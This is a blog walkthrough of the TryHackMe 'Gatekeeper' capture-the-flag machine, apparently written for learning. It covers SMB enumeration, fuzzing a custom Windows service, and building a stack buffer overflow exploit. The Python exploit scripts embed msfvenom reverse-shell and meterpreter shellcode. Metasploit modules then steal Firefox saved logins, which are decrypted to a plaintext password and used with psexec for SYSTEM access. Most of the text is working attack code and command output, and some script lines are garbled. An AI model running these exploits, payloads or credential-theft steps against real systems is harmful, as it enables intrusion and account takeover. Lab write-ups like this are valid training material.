[Tryhackme] Gatekeeper (Buffer overflow vulnerability, firefox user credential information cracking)

Posted by dzoddi on Wed, 24 Nov 2021 21:20:47 +0100


The host penetrated by this article is legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal use. I will not be responsible for any consequences or any misuse or damage caused.

Service Probe

└─# nmap -sV -Pn 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 00:58 EST
Nmap scan report for
Host is up (0.33s latency).
Not shown: 991 closed ports
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
31337/tcp open  Elite?
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49175/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.24 seconds

No discovery with enum4linux

Using smbmap to detect shared folders that anonymous can access

└─# smbmap -H -u anonymous
[+] Guest session       IP:    Name:                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Users                                                   READ ONLY

Ability to access Users folder

└─# smbclient //     
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu May 14 21:57:08 2020
  ..                                 DR        0  Thu May 14 21:57:08 2020
  Default                           DHR        0  Tue Jul 14 03:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:54:24 2009
  Share                               D        0  Thu May 14 21:58:07 2020

                7863807 blocks of size 4096. 3877398 blocks available

Download and analyze all downloadable files, especially the gatekeeper.exe file under Share

smb: \share\> ls
  .                                   D        0  Thu May 14 21:58:07 2020
  ..                                  D        0  Thu May 14 21:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 01:27:17 2020

We opened this gatekeeper.exe program on windows and found that he opened port 31337. From the nmap scan results, the target also opened port 313337, which means the program is running inside the target.

buffer overflow attack


To test and verify buffer overflow repeatedly, we need another windows target machine, which has a win7 target machine on it and the Immunity Debugger program installed on it. There is no further discussion about the use of Immunity Debugger here.
The win7 target's intranet IP is

Prepare the following FUZZY script in kali:

import sys, socket

ip = ''
port = 31337
buffer = ['A']
counter = 100

while len(buffer) <= 10:
    counter = counter + 100

    for string in buffer:
        print '[+] Sending %s bytes...' % len(string)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        s.send("User" '\r\n')
        s.send(string + '\r\n')
        print '[+] Done'
    print '[!] A connection can\'t be stablished to the program. It may have crashed.'

Run fuzzy.py, and when 300 bytes are sent, the target program runs.

Calculate EIP Location

Here we generate a non-repeating byte that is slightly longer than the number of bytes that Fuzzing will crash into the target program. Here we select 400 bytes to execute

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 400

└─# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 400

Attack using the following script, exploit1.py, to place the strings generated above on payload:


#The main purpose here is to locate the memory address of the EIP
import socket

ip = ""
port = 31337

prefix = "OVERFLOW1 "
offset = 0 
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Could not connect.")

EIP address: 65413565

Calculate offset of EIP

msf-pattern_offset -q 65413565

└─# msf-pattern_offset -q 65413565
[*] Exact match at offset 136

The offset value is 136.

Find Bad Bytes

We type:! Mona bytearray-b "\x00"

0x00 is terminated in C/C++, so it's a very common bad byte, so let's get rid of it first.
We use the bytearray.py script below to generate all the byte codes:

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')


└─# python3 bytearray.py 

At this point, we prepare the second attack script, exploit2.py, to paste the byte code generated above into the payload variable

At the same time, we assign offset 136 to the offset variable, BBBB BB to the retn variable, restart the program, and execute the following script

import socket

ip = ""
port = 31337

prefix = "OVERFLOW1 "
offset = 136
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Could not connect.")

We can see the value of the EIP, which has now become 4242242, 42 is the upper case B in ASCII, which is the value of exploit.py retn above, and it has now been shown to cover the EIP.

Also, remember that the ESP value here is: 004619f9

Let's do it! Mona compare-f C:\monagatekeeperbytearray.bin-a 004619f9

Get a sequence of possible bad bytes:


!mona bytearray -b "\x00\x01\x0a"

!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 004819F8

Now we've found all the bad bytes: \x00\x01x0a

Find shellcode


!mona jmp -r esp -cpb "\x00\x01\x0a"

There are two addresses, we choose the first one: 080414c3

Note that this address needs to be rewritten from the back, that is, \xc3x14x04x08

With msfvenom, we generate shellcode s for attacks

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b "\x00\x01\x0a" -f c

└─# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b "\x00\x01\x0a" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 

Put the generated shellcode in our last attack script, exploit3.py

import socket

ip = ""
port = 31337

prefix = "OVERFLOW1 "
offset = 136 
overflow = "A" * offset
retn = "\xc3\x14\x04\x08"

padding = "\x90" * 16

buf = ""
buf +="\xbf\x9b\xb8\x8f\xc4\xda\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
buf +="\x52\x83\xc0\x04\x31\x78\x0e\x03\xe3\xb6\x6d\x31\xef\x2f\xf3"
buf +="\xba\x0f\xb0\x94\x33\xea\x81\x94\x20\x7f\xb1\x24\x22\x2d\x3e"
buf +="\xce\x66\xc5\xb5\xa2\xae\xea\x7e\x08\x89\xc5\x7f\x21\xe9\x44"
buf +="\xfc\x38\x3e\xa6\x3d\xf3\x33\xa7\x7a\xee\xbe\xf5\xd3\x64\x6c"
buf +="\xe9\x50\x30\xad\x82\x2b\xd4\xb5\x77\xfb\xd7\x94\x26\x77\x8e"
buf +="\x36\xc9\x54\xba\x7e\xd1\xb9\x87\xc9\x6a\x09\x73\xc8\xba\x43"
buf +="\x7c\x67\x83\x6b\x8f\x79\xc4\x4c\x70\x0c\x3c\xaf\x0d\x17\xfb"
buf +="\xcd\xc9\x92\x1f\x75\x99\x05\xfb\x87\x4e\xd3\x88\x84\x3b\x97"
buf +="\xd6\x88\xba\x74\x6d\xb4\x37\x7b\xa1\x3c\x03\x58\x65\x64\xd7"
buf +="\xc1\x3c\xc0\xb6\xfe\x5e\xab\x67\x5b\x15\x46\x73\xd6\x74\x0f"
buf +="\xb0\xdb\x86\xcf\xde\x6c\xf5\xfd\x41\xc7\x91\x4d\x09\xc1\x66"
buf +="\xb1\x20\xb5\xf8\x4c\xcb\xc6\xd1\x8a\x9f\x96\x49\x3a\xa0\x7c"
buf +="\x89\xc3\x75\xd2\xd9\x6b\x26\x93\x89\xcb\x96\x7b\xc3\xc3\xc9"
buf +="\x9c\xec\x09\x62\x36\x17\xda\x4d\x6f\x14\x59\x26\x72\x1a\x4c"
buf +="\xea\xfb\xfc\x04\x02\xaa\x57\xb1\xbb\xf7\x23\x20\x43\x22\x4e"
buf +="\x62\xcf\xc1\xaf\x2d\x38\xaf\xa3\xda\xc8\xfa\x99\x4d\xd6\xd0"
buf +="\xb5\x12\x45\xbf\x45\x5c\x76\x68\x12\x09\x48\x61\xf6\xa7\xf3"
buf +="\xdb\xe4\x35\x65\x23\xac\xe1\x56\xaa\x2d\x67\xe2\x88\x3d\xb1"
buf +="\xeb\x94\x69\x6d\xba\x42\xc7\xcb\x14\x25\xb1\x85\xcb\xef\x55"
buf +="\x53\x20\x30\x23\x5c\x6d\xc6\xcb\xed\xd8\x9f\xf4\xc2\x8c\x17"
buf +="\x8d\x3e\x2d\xd7\x44\xfb\x4d\x3a\x4c\xf6\xe5\xe3\x05\xbb\x6b"
buf +="\x14\xf0\xf8\x95\x97\xf0\x80\x61\x87\x71\x84\x2e\x0f\x6a\xf4"
buf +="\x3f\xfa\x8c\xab\x40\x2f";

payload = buf
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Could not connect.")

Let's start with a new window in kali that opens listening: nc-lvp 4444

Restart gatekeeper.exe to execute exploit3.py

Get our target's bounce shell:

└─# nc -lnvp 4444             
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49184
Microsoft Windows [�Fen6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����



So far, we have successfully verified that gatekeeper.exe has a buffer overflow vulnerability at the local target machine.

Official Attack

For ease of subsequent infiltration, our payload was replaced by meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b "\x00\x01\x0a" -f c

└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=  LPORT=4444 EXITFUNC=thread -b "\x00\x01\x0a" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 402 (iteration=0)
x86/shikata_ga_nai chosen with final size 402
Payload size: 402 bytes
Final size of c file: 1713 bytes
unsigned char buf[] = 

Copy the payload generated above to the attack script below, change the ip address to the remote target address, and save it as exploit4.py

import socket

ip = ""
port = 31337

prefix = "OVERFLOW1 "
offset = 136 
overflow = "A" * offset
retn = "\xc3\x14\x04\x08"

padding = "\x90" * 16

buf = ""
buf +="\xbb\xa9\xcd\x79\xdd\xdb\xdf\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
buf +="\x5e\x31\x5f\x15\x03\x5f\x15\x83\xc7\x04\xe2\x5c\x31\x91\x52"
buf +="\x9e\xca\x62\x0d\xaf\x18\x06\x46\x9d\xac\x4e\xbd\xaa\x9f\x5c"
buf +="\xb5\xfe\x0b\x52\x7e\xb4\x15\x5d\x7f\xc3\x28\xb5\x4e\x13\x60"
buf +="\xf9\xd1\xef\x7b\x2e\x32\xce\xb3\x23\x33\x17\x02\x49\xdc\xc5"
buf +="\xc2\x3a\x70\xf9\x67\x7e\x49\xf8\xa7\xf4\xf1\x82\xc2\xcb\x86"
buf +="\x3e\xcc\x1b\x36\x35\x86\x83\x3c\x11\x37\xb5\x91\x24\xfe\xc1"
buf +="\x29\x6f\x30\xd5\xd9\x5b\xb9\x28\x08\x92\x7d\xeb\x7b\xd9\xd1"
buf +="\xed\x44\xd9\xc9\x9b\xbe\x1a\x77\x9c\x04\x61\xa3\x29\x9b\xc1"
buf +="\x20\x89\x7f\xf0\xe5\x4c\x0b\xfe\x42\x1a\x53\xe2\x55\xcf\xef"
buf +="\x1e\xdd\xee\x3f\x97\xa5\xd4\x9b\xfc\x7e\x74\xbd\x58\xd0\x89"
buf +="\xdd\x04\x8d\x2f\x95\xa6\xd8\x50\x56\x39\xe5\x0c\xc1\xf6\x28"
buf +="\xaf\x11\x90\x3b\xdc\x23\x3f\x90\x4a\x08\xc8\x3e\x8c\x19\xde"
buf +="\xc0\x42\xa1\x8e\x3e\x63\xd2\x87\x84\x37\x82\xbf\x2d\x38\x49"
buf +="\x3f\xd1\xed\xe4\x35\x45\x04\xf4\x5c\x3c\x70\x04\x5e\x2f\xdd"
buf +="\x81\xb8\x1f\x8d\xc1\x14\xe0\x7d\xa2\xc4\x88\x97\x2d\x3b\xa8"
buf +="\x97\xe7\x54\x43\x78\x5e\x0d\xfc\xe1\xfb\xc5\x9d\xee\xd1\xa0"
buf +="\x9e\x65\xd0\x55\x50\x8e\x91\x45\x85\xe9\x59\x95\x56\x9c\x59"
buf +="\xff\x52\x36\x0d\x97\x58\x6f\x79\x38\xa2\x5a\xf9\x3e\x5c\x1b"
buf +="\xc8\x35\x6b\x89\x74\x21\x94\x5d\x75\xb1\xc2\x37\x75\xd9\xb2"
buf +="\x63\x26\xfc\xbc\xb9\x5a\xad\x28\x42\x0b\x02\xfa\x2a\xb1\x7d"
buf +="\xcc\xf4\x4a\xa8\x4e\xf2\xb5\x2f\x79\x5b\xde\xcf\x39\x5b\x1e"
buf +="\xa5\xb9\x0b\x76\x32\x95\xa4\xb6\xbb\x3c\xed\xde\x36\xd1\x5f"
buf +="\x7e\x47\xf8\x3e\xde\x48\x0f\x9b\xd1\x33\x60\x1c\x12\xc4\x68"
buf +="\x79\x12\xc5\x94\x7f\x2e\x10\xad\xf5\x71\xa1\x8a\x16\x6c\x0f"
buf +="\xe7\xbe\x29\xda\x4a\xa3\xc9\x31\x88\xda\x49\xb3\x71\x19\x51"
buf +="\xb6\x74\x65\xd5\x2b\x05\xf6\xb0\x4b\xba\xf7\x90";

payload = buf
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Could not connect.")

Listen, execute, get the initial shell and user.txt:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-11-24 04:18:57 -0500

meterpreter > getuid
Server username: GATEKEEPER\natbat
meterpreter > cat user.txt.txt

The buffer overflow in this room is credited to Justin Steven and his 
"dostackbufferoverflowgood" program.  Thank you!


We use windows/gather/enum_ Application module lists software information for target machine installation

meterpreter > run post/windows/gather/enum_applications 
[*] Enumerating applications installed on GATEKEEPER                                                                                                                      

Installed Applications

 Name                                                                Version
 ----                                                                -------
 Amazon SSM Agent                                                    2.3.842.0
 Amazon SSM Agent                                                    2.3.842.0
 EC2ConfigService                                                    4.9.4222.0
 EC2ConfigService                                                    4.9.4222.0
 EC2ConfigService                                                    4.9.4222.0
 EC2ConfigService                                                    4.9.4222.0
 Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.20.27508  14.20.27508.1
 Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.20.27508  14.20.27508.1
 Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.20.27508  14.20.27508.1
 Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.20.27508  14.20.27508.1
 Microsoft Visual C++ 2019 X86 Additional Runtime - 14.20.27508      14.20.27508
 Microsoft Visual C++ 2019 X86 Additional Runtime - 14.20.27508      14.20.27508
 Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.20.27508         14.20.27508
 Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.20.27508         14.20.27508
 Mozilla Firefox 75.0 (x86 en-US)                                    75.0

Seeing that the target machine has Firefox browser installed, we continue using post/multi/gather/firefox_creds tries to export the possible login credentials on the browser using a module that enumerates the user information stored by firefox.

meterpreter > run post/multi/gather/firefox_creds 

[-] Error loading USER S-1-5-21-663372427-3699997616-3390412905-1000: Hive could not be loaded, are you Admin?
[*] Checking for Firefox profile in: C:\Users\natbat\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release
[+] Downloaded cert9.db: /root/.msf4/loot/20211124083259_default_10.10.97.198_ff.ljfn812a.cert_093945.bin
[+] Downloaded cookies.sqlite: /root/.msf4/loot/20211124083301_default_10.10.97.198_ff.ljfn812a.cook_335589.bin
[+] Downloaded key4.db: /root/.msf4/loot/20211124083306_default_10.10.97.198_ff.ljfn812a.key4_584356.bin
[+] Downloaded logins.json: /root/.msf4/loot/20211124083310_default_10.10.97.198_ff.ljfn812a.logi_811634.bin

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\rajfzh3y.default

Use the strings command to view the last file with the word login:

└─# strings /root/.msf4/loot/20211124083310_default_10.10.97.198_ff.ljfn812a.logi_811634.bin                                                                         12 ⨯


Encrypted Username and Pasword are seen above

We use This script When exporting encrypted user credentials, it is important to note that the folders exported above will be changed to their respective file names.

└─# mv /root/.msf4/loot/20211124083259_default_10.10.97.198_ff.ljfn812a.cert_093945.bin /root/.msf4/lootcert9.db 
└─# mv /root/.msf4/loot/20211124083301_default_10.10.97.198_ff.ljfn812a.cook_335589.bin /root/.msf4/loot/cookies.sqlite
└─# mv /root/.msf4/loot/20211124083306_default_10.10.97.198_ff.ljfn812a.key4_584356.bin /root/.msf4/loot/key4.db       
└─# mv /root/.msf4/loot/20211124083310_default_10.10.97.198_ff.ljfn812a.logi_811634.bin /root/.msf4/loot/logins.json

Execute script to export user credentials

└─# python3 firefox_decrypt.py /root/.msf4/loot/                                                      
2021-11-24 09:25:29,014 - WARNING - profile.ini not found in /root/.msf4/loot/
2021-11-24 09:25:29,015 - WARNING - Continuing and assuming '/root/.msf4/loot/' is a profile location

Website:   https://creds.com
Username: 'mayor'
Password: '8CL7O1N78MdrCIsV'

Use psexec.py

└─# locate psexec.py      

Log in to mayor's account and get root.txt

└─# python3 /usr/share/doc/python3-impacket/examples/psexec.py mayor@                                                                                                                                                                                                                                        1 ⨯
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file fLGVcyVU.exe
[*] Opening SVCManager on
[*] Creating service lccL on
[*] Starting service lccL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system
c:\Users\mayor\Desktop>type c:\Users\mayor\Desktop\root.txt.txt

Topics: penetration test